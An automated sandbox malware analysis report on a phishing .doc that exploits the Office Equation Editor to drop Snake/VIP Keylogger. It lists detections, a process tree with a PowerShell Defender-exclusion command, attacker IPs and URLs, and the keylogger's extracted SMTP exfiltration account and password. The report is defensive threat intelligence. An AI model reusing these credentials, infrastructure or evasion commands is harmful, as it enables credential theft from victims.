Edit tour

Windows Analysis Report
Thyssenkrupp PO040232.doc

Overview

General Information

Sample name:	Thyssenkrupp PO040232.doc
Analysis ID:	1519252
MD5:	d441cab32cafefaed9326b791cfc3b15
SHA1:	44aa1ba0ae5fb845899750881708003365937cea
SHA256:	b9a387acc992d7431adfbbf28a1b18baa07c1dc64592c193d78c6a517747692d
Tags:	docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Initial sample is an obfuscated RTF file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Potential downloader shellcode found

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to download and execute PE files

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Outbound SMTP Connections

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3184 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3268 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

hgqilegacy20306.exe (PID: 3416 cmdline: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe" MD5: 3E2EA8C3F5CA13F16F8CA1C85087F6B6)

powershell.exe (PID: 3492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

hgqilegacy20306.exe (PID: 3508 cmdline: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe" MD5: 3E2EA8C3F5CA13F16F8CA1C85087F6B6)

EQNEDT32.EXE (PID: 3760 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Thyssenkrupp PO040232.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0xb8a2:$obj2: \objdata 0xb8b6:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e434:$a1: get_encryptedPassword 0x2e9bc:$a2: get_encryptedUsername 0x2e0a7:$a3: get_timePasswordChanged 0x2e1be:$a4: get_passwordField 0x2e44a:$a5: set_encryptedPassword 0x31173:$a6: get_passwords 0x31507:$a7: get_logins 0x3115f:$a8: GetOutlookPasswords 0x30b18:$a9: StartKeylogger 0x31460:$a10: KeyLoggerEventArgs 0x30bb8:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbf374:$a1: get_encryptedPassword 0x102b94:$a1: get_encryptedPassword 0x25aab4:$a1: get_encryptedPassword 0xbf8fc:$a2: get_encryptedUsername 0x10311c:$a2: get_encryptedUsername 0x25b03c:$a2: get_encryptedUsername 0xbefe7:$a3: get_timePasswordChanged 0x102807:$a3: get_timePasswordChanged 0x25a727:$a3: get_timePasswordChanged 0xbf0fe:$a4: get_passwordField 0x10291e:$a4: get_passwordField 0x25a83e:$a4: get_passwordField 0xbf38a:$a5: set_encryptedPassword 0x102baa:$a5: set_encryptedPassword 0x25aaca:$a5: set_encryptedPassword 0xc20b3:$a6: get_passwords 0x1058d3:$a6: get_passwords 0x25d7f3:$a6: get_passwords 0xc2447:$a7: get_logins 0x105c67:$a7: get_logins 0x25db87:$a7: get_logins
Process Memory Space: hgqilegacy20306.exe PID: 3416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hgqilegacy20306.exe PID: 3416	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hgqilegacy20306.exe PID: 3416	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hgqilegacy20306.exe PID: 3416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cdfa:$a1: get_encryptedPassword 0x3d378:$a2: get_encryptedUsername 0x3ca7c:$a3: get_timePasswordChanged 0x3cb93:$a4: get_passwordField 0x3ce10:$a5: set_encryptedPassword 0x3fae1:$a6: get_passwords 0x3fe71:$a7: get_logins 0x3facd:$a8: GetOutlookPasswords 0x3f486:$a9: StartKeylogger 0x3fdca:$a10: KeyLoggerEventArgs 0x3f526:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: hgqilegacy20306.exe PID: 3508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hgqilegacy20306.exe PID: 3508	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hgqilegacy20306.exe PID: 3508	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hgqilegacy20306.exe PID: 3508	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1454a:$a1: get_encryptedPassword 0x14ac8:$a2: get_encryptedUsername 0x141cc:$a3: get_timePasswordChanged 0x142e3:$a4: get_passwordField 0x14560:$a5: set_encryptedPassword 0x17231:$a6: get_passwords 0x175c1:$a7: get_logins 0x1721d:$a8: GetOutlookPasswords 0x16bd6:$a9: StartKeylogger 0x1751a:$a10: KeyLoggerEventArgs 0x16c76:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.hgqilegacy20306.exe.3415480.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c834:$a1: get_encryptedPassword 0x2cdbc:$a2: get_encryptedUsername 0x2c4a7:$a3: get_timePasswordChanged 0x2c5be:$a4: get_passwordField 0x2c84a:$a5: set_encryptedPassword 0x2f573:$a6: get_passwords 0x2f907:$a7: get_logins 0x2f55f:$a8: GetOutlookPasswords 0x2ef18:$a9: StartKeylogger 0x2f860:$a10: KeyLoggerEventArgs 0x2efb8:$a11: KeyLoggerEventArgsEventHandler
5.2.hgqilegacy20306.exe.3415480.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39e76:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39519:$a3: \Google\Chrome\User Data\Default\Login Data 0x39776:$a4: \Orbitum\User Data\Default\Login Data 0x3a155:$a5: \Kometa\User Data\Default\Login Data
5.2.hgqilegacy20306.exe.3415480.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2dbf8:$s1: UnHook 0x2dbff:$s2: SetHook 0x2dc07:$s3: CallNextHook 0x2dc14:$s4: _hook
5.2.hgqilegacy20306.exe.3279d40.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c834:$a1: get_encryptedPassword 0x2cdbc:$a2: get_encryptedUsername 0x2c4a7:$a3: get_timePasswordChanged 0x2c5be:$a4: get_passwordField 0x2c84a:$a5: set_encryptedPassword 0x2f573:$a6: get_passwords 0x2f907:$a7: get_logins 0x2f55f:$a8: GetOutlookPasswords 0x2ef18:$a9: StartKeylogger 0x2f860:$a10: KeyLoggerEventArgs 0x2efb8:$a11: KeyLoggerEventArgsEventHandler
5.2.hgqilegacy20306.exe.3279d40.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39e76:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39519:$a3: \Google\Chrome\User Data\Default\Login Data 0x39776:$a4: \Orbitum\User Data\Default\Login Data 0x3a155:$a5: \Kometa\User Data\Default\Login Data
5.2.hgqilegacy20306.exe.3279d40.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2dbf8:$s1: UnHook 0x2dbff:$s2: SetHook 0x2dc07:$s3: CallNextHook 0x2dc14:$s4: _hook
8.2.hgqilegacy20306.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.hgqilegacy20306.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.hgqilegacy20306.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.hgqilegacy20306.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.hgqilegacy20306.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e634:$a1: get_encryptedPassword 0x2ebbc:$a2: get_encryptedUsername 0x2e2a7:$a3: get_timePasswordChanged 0x2e3be:$a4: get_passwordField 0x2e64a:$a5: set_encryptedPassword 0x31373:$a6: get_passwords 0x31707:$a7: get_logins 0x3135f:$a8: GetOutlookPasswords 0x30d18:$a9: StartKeylogger 0x31660:$a10: KeyLoggerEventArgs 0x30db8:$a11: KeyLoggerEventArgsEventHandler
8.2.hgqilegacy20306.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bc76:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b319:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b576:$a4: \Orbitum\User Data\Default\Login Data 0x3bf55:$a5: \Kometa\User Data\Default\Login Data
8.2.hgqilegacy20306.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f9f8:$s1: UnHook 0x2f9ff:$s2: SetHook 0x2fa07:$s3: CallNextHook 0x2fa14:$s4: _hook
5.2.hgqilegacy20306.exe.3415480.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.hgqilegacy20306.exe.3415480.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e634:$a1: get_encryptedPassword 0x2ebbc:$a2: get_encryptedUsername 0x2e2a7:$a3: get_timePasswordChanged 0x2e3be:$a4: get_passwordField 0x2e64a:$a5: set_encryptedPassword 0x31373:$a6: get_passwords 0x31707:$a7: get_logins 0x3135f:$a8: GetOutlookPasswords 0x30d18:$a9: StartKeylogger 0x31660:$a10: KeyLoggerEventArgs 0x30db8:$a11: KeyLoggerEventArgsEventHandler
5.2.hgqilegacy20306.exe.3415480.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f9f8:$s1: UnHook 0x2f9ff:$s2: SetHook 0x2fa07:$s3: CallNextHook 0x2fa14:$s4: _hook
5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e634:$a1: get_encryptedPassword 0x71e54:$a1: get_encryptedPassword 0x1c9d74:$a1: get_encryptedPassword 0x2ebbc:$a2: get_encryptedUsername 0x723dc:$a2: get_encryptedUsername 0x1ca2fc:$a2: get_encryptedUsername 0x2e2a7:$a3: get_timePasswordChanged 0x71ac7:$a3: get_timePasswordChanged 0x1c99e7:$a3: get_timePasswordChanged 0x2e3be:$a4: get_passwordField 0x71bde:$a4: get_passwordField 0x1c9afe:$a4: get_passwordField 0x2e64a:$a5: set_encryptedPassword 0x71e6a:$a5: set_encryptedPassword 0x1c9d8a:$a5: set_encryptedPassword 0x31373:$a6: get_passwords 0x74b93:$a6: get_passwords 0x1ccab3:$a6: get_passwords 0x31707:$a7: get_logins 0x74f27:$a7: get_logins 0x1cce47:$a7: get_logins
5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f9f8:$s1: UnHook 0x73218:$s1: UnHook 0x1cb138:$s1: UnHook 0x2f9ff:$s2: SetHook 0x7321f:$s2: SetHook 0x1cb13f:$s2: SetHook 0x2fa07:$s3: CallNextHook 0x73227:$s3: CallNextHook 0x1cb147:$s3: CallNextHook 0x2fa14:$s4: _hook 0x73234:$s4: _hook 0x1cb154:$s4: _hook
Click to see the 26 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3268, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3268, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3268, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentProcessId: 3416, ParentProcessName: hgqilegacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3492, ProcessName: powershell.exe

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3268, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3416, ProcessName: hgqilegacy20306.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3268, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3416, ProcessName: hgqilegacy20306.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, QueryName: checkip.dyndns.org

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 217.12.218.219, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, Initiated: true, ProcessId: 3508, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49180

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3268, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe, ParentProcessId: 3416, ParentProcessName: hgqilegacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe", ProcessId: 3492, ProcessName: powershell.exe

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3492, TargetFilename: C:\Users\user\AppData\Local\Temp\m0e2fsxs.vl2.ps1

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:19:22.080013+0200	2022050	1	A Network Trojan was detected	66.63.187.123	80	192.168.2.22	49161	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:19:22.216241+0200	2022051	1	A Network Trojan was detected	66.63.187.123	80	192.168.2.22	49161	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:19:29.445238+0200	2803305	3	Unknown Traffic	192.168.2.22	49164	188.114.97.3	443	TCP
2024-09-26T09:19:30.835613+0200	2803305	3	Unknown Traffic	192.168.2.22	49166	188.114.96.3	443	TCP
2024-09-26T09:19:33.963816+0200	2803305	3	Unknown Traffic	192.168.2.22	49170	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:19:27.712093+0200	2803274	2	Potentially Bad Traffic	192.168.2.22	49162	193.122.130.0	80	TCP
2024-09-26T09:19:29.038087+0200	2803274	2	Potentially Bad Traffic	192.168.2.22	49162	193.122.130.0	80	TCP
2024-09-26T09:19:30.394686+0200	2803274	2	Potentially Bad Traffic	192.168.2.22	49165	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Thyssenkrupp PO040232.doc

Avira: detected

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: Thyssenkrupp PO040232.doc

ReversingLabs: Detection: 44%

Machine Learning detection for dropped file

